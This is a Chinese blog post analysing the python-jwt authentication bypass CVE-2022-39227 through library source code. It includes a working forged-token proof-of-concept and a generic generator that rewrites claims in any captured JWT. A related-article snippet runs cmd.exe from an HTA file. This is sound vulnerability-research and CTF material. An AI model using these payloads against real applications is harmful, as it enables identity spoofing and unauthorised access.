Python-JWT身份验证绕过(CVE-2022-39227)

最新推荐文章于 2024-06-14 09:32:55 发布
最新推荐文章于 2024-06-14 09:32:55 发布
阅读量1.3k 收藏 19
点赞数 19
分类专栏: 漏洞复现 文章标签: python 开发语言 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zls1793/article/details/135328558
版权

文章目录

CVE-2022-39227-Python-JWT

介绍:

python-jwt库中的verify_jwt()存在身份验证绕过漏洞

版本:

python-jwt < 3.3.4

漏洞分析:

环境搭建:pip install python-jwt == 3.3.3

以 以下的复现代码为例分析漏洞

from json import *
from python_jwt import *
from jwcrypto import jwk

#jwt载荷主体
payload = {'role': "guest"}
#256位密钥生成
key = jwk.JWK.generate(kty='oct', size=256)
#生成jwt以HS256加密签名
jwt_json = generate_jwt(payload, key, 'HS256', timedelta(minutes=60))
###以下部分为payload生成###
[header, payload, signature] = jwt_json.split('.')
parsed_payload = loads(base64url_decode(payload))
parsed_payload['role'] = "admin"
#把python数组转化为json数据,并base64加密
fake = base64url_encode(dumps(parsed_payload))
#构造一个绕过的json形式的payload,这是关键下面会分析
fake_jwt = '{" ' + header + '.' + fake + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
print(fake_jwt)
token = verify_jwt(fake_jwt, key, ['HS256'])
#成功绕过打印结果
print(token)
1.进入验证返回函数verify_jwt
def verify_jwt(jwt,
               pub_key=None,
               allowed_algs=None,
               iat_skew=timedelta(),
               checks_optional=False,
               ignore_not_implemented=False):
    
    if allowed_algs is None:
        allowed_algs = []

    if not isinstance(allowed_algs, list):
        # jwcrypto only supports list of allowed algorithms
        raise _JWTError('allowed_algs must be a list')

    header, claims, _ = jwt.split('.')

    parsed_header = json_decode(base64url_decode(header))

    alg = parsed_header.get('alg')
    if alg is None:
        raise _JWTError('alg header not present')
    if alg not in allowed_algs:
        raise _JWTError('algorithm not allowed: ' + alg)

    if not ignore_not_implemented:
        for k in parsed_header:
            if k not in JWSHeaderRegistry:
                raise _JWTError('unknown header: ' + k)
            if not JWSHeaderRegistry[k].supported:
                raise _JWTError('header not implemented: ' + k)

    if pub_key:
        token = JWS()
        token.allowed_algs = allowed_algs
        token.deserialize(jwt, pub_key)
    elif 'none' not in allowed_algs:
        raise _JWTError('no key but none alg not allowed')

    parsed_claims = json_decode(base64url_decode(claims))

    utcnow = datetime.utcnow()
    now = timegm(utcnow.utctimetuple())

    typ = parsed_header.get('typ')
    if typ is None:
        if not checks_optional:
            raise _JWTError('typ header not present')
    elif typ != 'JWT':
        raise _JWTError('typ header is not JWT')

    iat = parsed_claims.get('iat')
    if iat is None:
        if not checks_optional:
            raise _JWTError('iat claim not present')
    elif iat > timegm((utcnow + iat_skew).utctimetuple()):
        raise _JWTError('issued in the future')

    nbf = parsed_claims.get('nbf')
    if nbf is None:
        if not checks_optional:
            raise _JWTError('nbf claim not present')
    elif nbf > now:
        raise _JWTError('not yet valid')

    exp = parsed_claims.get('exp')
    if exp is None:
        if not checks_optional:
            raise _JWTError('exp claim not present')
    elif exp <= now:
        raise _JWTError('expired')

    return parsed_header, parsed_claims

逐段对函数verify_jwt()进行分析

  • 首先验证传入的allowed_algs(指定的签名验证算法)是否合规

        #传入的allowed_algs校验
    if allowed_algs is None:
        allowed_algs = []

    if not isinstance(allowed_algs, list):
        # jwcrypto only supports list of allowed algorithms
        raise _JWTError('allowed_algs must be a list')

  • 接着将传入的要验证的jwt根据.号分为三段分别存储,并将第一段header通过base64解码

        #将传入的jwt分为三段
    header, claims, _ = jwt.split('.')
    parsed_header = json_decode(base64url_decode(header))

  • 接着验证header中存储相关信息是否合规(alg指定的签名验证算法是否和allowed_algs中指定的是否一致等)

       #header头合规验证
   alg = parsed_header.get('alg')
    if alg is None:
        raise _JWTError('alg header not present')
    if alg not in allowed_algs:
        raise _JWTError('algorithm not allowed: ' + alg)

    if not ignore_not_implemented:
        for k in parsed_header:
            if k not in JWSHeaderRegistry:
                raise _JWTError('unknown header: ' + k)
            if not JWSHeaderRegistry[k].supported:
                raise _JWTError('header not implemented: ' + k)

  • 接着对签名进行验证

     #token.deserialize进行签名验证
 if pub_key:
        token = JWS()
        token.allowed_algs = allowed_algs
        token.deserialize(jwt, pub_key)
    elif 'none' not in allowed_algs:
        raise _JWTError('no key but none alg not allowed')

  • 如果签名验证成功无错误返回,则将jwt载荷(payload)解码传给parsed_claims(后续会将parsed_claims返回作为得到的成功验证的信息)

    parsed_claims = json_decode(base64url_decode(claims))

  • 对jwt载荷中的其他信息进行判断(如是否超过jwt有效时间等)

       utcnow = datetime.utcnow()
    now = timegm(utcnow.utctimetuple())

    typ = parsed_header.get('typ')
    if typ is None:
        if not checks_optional:
            raise _JWTError('typ header not present')
    elif typ != 'JWT':
        raise _JWTError('typ header is not JWT')

    iat = parsed_claims.get('iat')
    if iat is None:
        if not checks_optional:
            raise _JWTError('iat claim not present')
    elif iat > timegm((utcnow + iat_skew).utctimetuple()):
        raise _JWTError('issued in the future')

    nbf = parsed_claims.get('nbf')
    if nbf is None:
        if not checks_optional:
            raise _JWTError('nbf claim not present')
    elif nbf > now:
        raise _JWTError('not yet valid')

    exp = parsed_claims.get('exp')
    if exp is None:
        if not checks_optional:
            raise _JWTError('exp claim not present')
    elif exp <= now:
        raise _JWTError('expired')

  • 最后返回成功结果:解码过的jwt header和jwt 载荷(payload)

     return parsed_header, parsed_claims
2.token.deserialize()方法分析

对于一个传入的jwt,我们要使其通过验证,必须要使token.deserialize()验证通过。我们来看token.deserialize()的验证过程

 def deserialize(self, raw_jws, key=None, alg=None):
        self.objects = {}
        o = {}
        try:
            try:
                djws = json_decode(raw_jws)
                if 'signatures' in djws:
                    o['signatures'] = []
                    for s in djws['signatures']:
                        os = self._deserialize_signature(s)
                        o['signatures'].append(os)
                        self._deserialize_b64(o, os.get('protected'))
                else:
                    o = self._deserialize_signature(djws)
                    self._deserialize_b64(o, o.get('protected'))

                if 'payload' in djws:
                    if o.get('b64', True):
                        o['payload'] = base64url_decode(str(djws['payload']))
                    else:
                        o['payload'] = djws['payload']

            except ValueError:
                c = raw_jws.split('.')
                if len(c) != 3:
                    raise InvalidJWSObject('Unrecognized'
                                           ' representation') from None
                p = base64url_decode(str(c[0]))
                if len(p) > 0:
                    o['protected'] = p.decode('utf-8')
                    self._deserialize_b64(o, o['protected'])
                o['payload'] = base64url_decode(str(c[1]))
                o['signature'] = base64url_decode(str(c[2]))

            self.objects = o

        except Exception as e:  # pylint: disable=broad-except
            raise InvalidJWSObject('Invalid format') from e

        if key:
            self.verify(key, alg)

逐段分析代码

  • 首先通过json_decode()方法对传入的raw_jws分别分为是json数据和不是json数据分别处理

                try:
                djws = json_decode(raw_jws)
                .....
                .....
            except ValueError:
                .....
                .....

    注意:我们可以看到这里通过try… except ValueError对数据进行分流处理,如果传入的不是json数据就会通过except ValueError下的语句处理

  • 第一种不是json数据的处理流程

    将raw_jws根据.分段,如果分段数不为3段则报错(也就是不是正常的jwt形式)

    然后将raw_jwt的三段数据(也就是头部,载荷,签证三部分)赋给数组o

    再将数组o赋给self.objects

    通过self.verify(key, alg)验证签证正确性key指的是加密密钥

                except ValueError:
                c = raw_jws.split('.')
                if len(c) != 3:
                    raise InvalidJWSObject('Unrecognized'
                                           ' representation') from None
                p = base64url_decode(str(c[0]))
                if len(p) > 0:
                    o['protected'] = p.decode('utf-8')
                    self._deserialize_b64(o, o['protected'])
                o['payload'] = base64url_decode(str(c[1]))
                o['signature'] = base64url_decode(str(c[2]))

            self.objects = o
            ....
        if key:
            self.verify(key, alg)

  • 第二种json数据的处理流程

    与第一种类似不过这次不用通过raw_jws.split(‘.’)分割,直接根据索引赋值头部,载荷,签证三部分给数组o

                try:
                djws = json_decode(raw_jws)
                if 'signatures' in djws:
                    o['signatures'] = []
                    for s in djws['signatures']:
                        os = self._deserialize_signature(s)
                        o['signatures'].append(os)
                        self._deserialize_b64(o, os.get('protected'))
                else:
                    o = self._deserialize_signature(djws)
                    self._deserialize_b64(o, o.get('protected'))

                if 'payload' in djws:
                    if o.get('b64', True):
                        o['payload'] = base64url_decode(str(djws['payload']))
                    else:
                        o['payload'] = djws['payload']
            ....
            ....
            ....
        if key:
            self.verify(key, alg)
3.最终利用

事实上verify_jwt()中将jwt根据.号划分成三段的做法 和 token.deserialize()方法的第二种处理jwt的方式结合会出现身份验证绕过漏洞

思路如下:

  1. 传入一个json形式的数据,根据正确的jwt伪造protected、payload、signatures键值对,从而成功通过token.deserialize()对签名正确的验证

  2. 再创造一个键值对,键名为我们自定义伪造的jwt,因为verify_jwt()中将jwt根据.号划分成三段的粗暴做法

    我们可以使得最终通过return parsed_header, parsed_claims返回的结果为我们想要的

复现代码中生成的payload就是这种形式的

fake_jwt = '{" ' + header + '.' + fake + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
print(fake_jwt)

print(fake_jwt)输出类似为以下形式

{
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOiAxNzAwMDYxNTgzLCAiaWF0IjogMTcwMDA1Nzk4MywgImp0aSI6ICJPdjYwNzVlaTZiS3BVVnE0YzE0b3F3IiwgIm5iZiI6IDE3MDAwNTc5ODMsICJyb2xlIjogImkgYW0gbm90IGd1ZXN0In0.":"",

"protected":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9", 

"payload":"eyJleHAiOjE3MDAwNjE1ODMsImlhdCI6MTcwMDA1Nzk4MywianRpIjoiT3Y2MDc1ZWk2YktwVVZxNGMxNG9xdyIsIm5iZiI6MTcwMDA1Nzk4Mywicm9sZSI6Imd1ZXN0In0",

"signature":"1cdkqIg3xvum-VlPBYG4V38o9zJsfBlCAoTjRRSqz0Q"
}

修改以下复现代码可以得到通用的payload

from json import *
from python_jwt import *
from jwcrypto import jwk


jwt_json = "获取到的jwt"
[header, payload, signature] = jwt_json.split('.')
parsed_payload = loads(base64url_decode(payload))
#这里键值对根据需要修改
parsed_payload['role'] = "i am not guest"
fake = base64url_encode(dumps(parsed_payload))
fake_jwt = '{" ' + header + '.' + fake + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
print(fake_jwt)
一个小细节:

上面说到

创造一个键值对,键名为我们自定义伪造的jwt,verify_jwt()会将jwt根据.号划分成三段,再将第一段和第二段分别通过base64url_decode()解码赋给parsed_header和 parsed_claims返回。

而我们构造的出来的payload的第一段是含有{“,那么解析不会出错吗

image-20231115223308809

事实上这是没问题的我们看一下关于base64url_decode()的介绍

base64url_decode()是一个用于解码Base64 URL安全编码的函数。
Base64 URL安全编码将标准的Base64编码进行了一些修改,以便在URL中传输时不会产生冲突。
具体而言,它使用"-“替换”+“,使用”_“替换”/“,并且将结尾的”="去除,并且会忽略掉不是base64的字符。

显然{”不是base64字符base64url_decode()会自动将其去掉

相关题目:
1.Newstar2023 Week5 Ye’s Pickle
2.2022祥云杯 FunWEB
LtmThink1793
关注
  • 19
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2022-39227jwt伪造
qq_32445755的博客
11-12 1223
python jwt是一个用于生成和验证JSON Web令牌的模块。3.3.4之前的版本会受到欺骗绕过身份验证的影响,从而导致身份欺骗、会话劫持或身份验证绕过。获得JWT的攻击者可以在不知道密钥的情况下任意伪造其内容。根据应用程序的不同,这可能使攻击者能够欺骗其他用户的身份、劫持他们的会话或绕过身份验证。用户应升级到版本3.3.4。没有已知的解决方法。
第二届祥云杯 Web 题解1
08-03
考点:SSRF、session条件竞争随意用户名都可以登陆,接着是SSRF的内容,通过访问 http://127.0.0.1/admin/ ,获得include
CVE-2022-39227-Python-JWT漏洞
Aiwin的博客
11-07 1908
CVE-2022-39227-Python-JWT漏洞
祥云杯2022复现
your_friends的博客
11-13 973
这个CVE的漏洞就是不需要公钥以及私钥就能构造出jwt的认证,稍作修改就可以更改:将里面的sub=bob改成is_admin=1然后拿出来输出一下。而我们点击页面的各种功能提示都是权限不够,那么这里也就是需要构造is_admin=1,在jwt这个版本更新之后,留下了检测是否存在漏洞的poc。苦于没有环境,我就只能口述了,利用graphql注入,注入出账号密码,最终登陆拿到flag。我这里只复现一下这个jwt伪造了,grahql只能纸上谈兵的看看了并不能实操。抓包的时候有一串jwt,解码出来之后可以看到。
CVE-2022-29072(7z漏洞复现及对应措施)
qq_43696276的博客
04-23 1703
CVE-2022-29072(7z漏洞复现及对应措施) 首先,找个txt文本,将以下代码输入: <html> <head> <HTA:APPLICATION ID="7zipcodeexec"> <script language="jscript"> var c = "cmd.exe"; new ActiveXObject('WScript.Shell').Run(c); </script> <head> <html> 然
sanic-jwt:Sanic的身份验证JWT和权限范围
04-30
Sanic JWT Sanic JWT向添加了身份验证保护和终结。 它很容易启动和运行,并且对于开发人员来说是可扩展的。 它可以起到保护端点的作用,还可以提供身份验证作用域,所有这些都封装在一个不错的。 |我该怎么办? 这很...
python-jwt:适用于Python的JSON Web令牌库
05-10
python-jwt python-jwt是由开发Python中的JSON Web令牌(JWT)实现。 例子 import json from datetime import datetime , timedelta , timezone from jwt import ( JWT , jwk_from_dict , jwk_from_pem , ) ...
auth-with-jwt:使用 JWT 进行身份验证
05-31
使用jwt令牌BaseUrl = 身份验证 1.本地 注册(POST) URL=BaserUrl/register Body={email,password,name} Retrun={userSchema} Login(POST) URL=BaserUrl/login Body={email,password} Retrun={userSchema,token( aka...
django-ariadne-jwt:Django中Ariadne的JWT身份验证
05-23
支持基于JWT身份验证,以与在项目中运行的 graphql库一起使用。 它在很大程度上受到启发。 安装 pip install django-ariadne-jwt 如何使用 django-ariadne-jwt旨在易于安装和使用。 首先将JSONWebTokenBackend...
python-jwt-react-login-flow:具有Flask后端和React前端的基于令牌的身份验证示例
02-05
Python + React代码库,包含使用JSON Web令牌的基于端到端令牌的身份验证。 动机 你很聪明。 您想要一个安全的应用程序。 您还希望能够设置一个将身份验证隔离到其自身环境的系统。 低,看,令牌。 无论基于云还是不...
绕过token
weixin_30448603的博客
05-22 1840
网站搭好了,下一步的目标就是直奔后台。因为一般前端在未登录的情况下只有查的功能。咱们的目标是增删改。 看到有添加功能时,先别着急的直接黑盒测试。先看看有没有防护 ######## 查看源码,搜索token字段,如果搜到了就已经证明凉了一半。看看等不能绕过(下一段,我会说一些常规的绕过方法关于token的),或者寻找其他的敏感功能点看是否有防护。因为业务的复杂度,大多数cms不会做全局的...
CVE-2022-33891漏洞原理、环境搭建和复现
qq_44767905的博客
07-25 8629
CVE-2022-33891漏洞原理、环境搭建和复现
Python安全绕过随机Token——使用Brup找出随机Token
weixin_43853965的博客
01-14 632
这是某OA的一个页面,主要功能是供用户提交一些需求,页面有表单和文件上传接口,在对该页面进行安全测试的时候,我希望对这些用户输入表单进行存储型XSS的测试,然而由于页面使用了随机Token,致使用扫描器进行扫描时发现并不能批量写入。于是用Burp进行手工测试。
LeetCode | 28.找出字符串中第一个匹配项的下标 KMP
编程菜鸟的学习记录
06-14 282
LeetCode | 28.找出字符串中第一个匹配项的下标 KMP
python迁移数据教程
2402_85292291的博客
06-13 655
if os.path.isfile(src_item_path): dest_item_path = os.path.join(dest_folder, item) shutil.copy2(src_item_path, dest_item_path) # 如果item是目录,递归调用migrate_data函数。2. 准备源文件夹和目标文件夹: 在您的计算机上创建两个文件夹,分别为源文件夹(source_folder)和目标文件夹(destination_folder)。将您希望迁移的数据放入源文件夹。
Python | Leetcode Python题解之第149题直线上最多的点数
Mopes__的博客
06-14 493
Python | Leetcode Python题解之第149题直线上最多的点数
YesPMP探索Python在生活中的应用,助力提升开发效率
YesPMP20的博客
06-13 789
Python是一种简单易学、高效强大的编程语言,正变成越来越多人选择的热门技能。学习Python不仅可以提供更多就业机会,还能让自己在职场更加有竞争力,那可以去哪里拓展自己的技能呢?
每日一题42:最小化字符串长度
最新发布
m0_63227758的博客
06-14 446
创建集合s = set() # 创建一个空集合s = {1, 2, 3} # 创建一个包含元素 1, 2, 3 的集合s = set([1, 2, 3]) # 通过列表创建集合# 添加和删除元素s.add(4) # 向集合中添加元素 4s.remove(3) # 从集合中删除元素 3,如果元素不存在则会引发 KeyErrors.discard(2) # 从集合中删除元素 2,如果元素不存在也不会报错# 集合运算intersection = s1 & s2 # 交集。
express-jwt
06-02
express-jwt是一个基于JSON Web Token(JWT)的身份验证中间件,用于在Express应用程序中验证用户的身份。JWT是一种跨域认证和授权的标准,它通过在客户端和服务器之间传递加密的JSON数据来实现身份验证和授权。 express-jwt可以拦截HTTP请求,并验证JWT令牌是否有效。如果令牌有效,则允许继续访问受保护的资源。如果令牌无效,则返回错误响应。express-jwt还支持自定义签名密钥、令牌有效期、请求头中的令牌名称等配置选项。此外,它还提供了一些有用的辅助函数,如从请求中提取令牌、生成新的令牌等。 使用express-jwt可以有效地保护Web应用程序中的敏感资源,避免未经授权的访问。它已经被广泛应用于各种Web应用程序中,包括社交网络、电子商务、金融服务等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值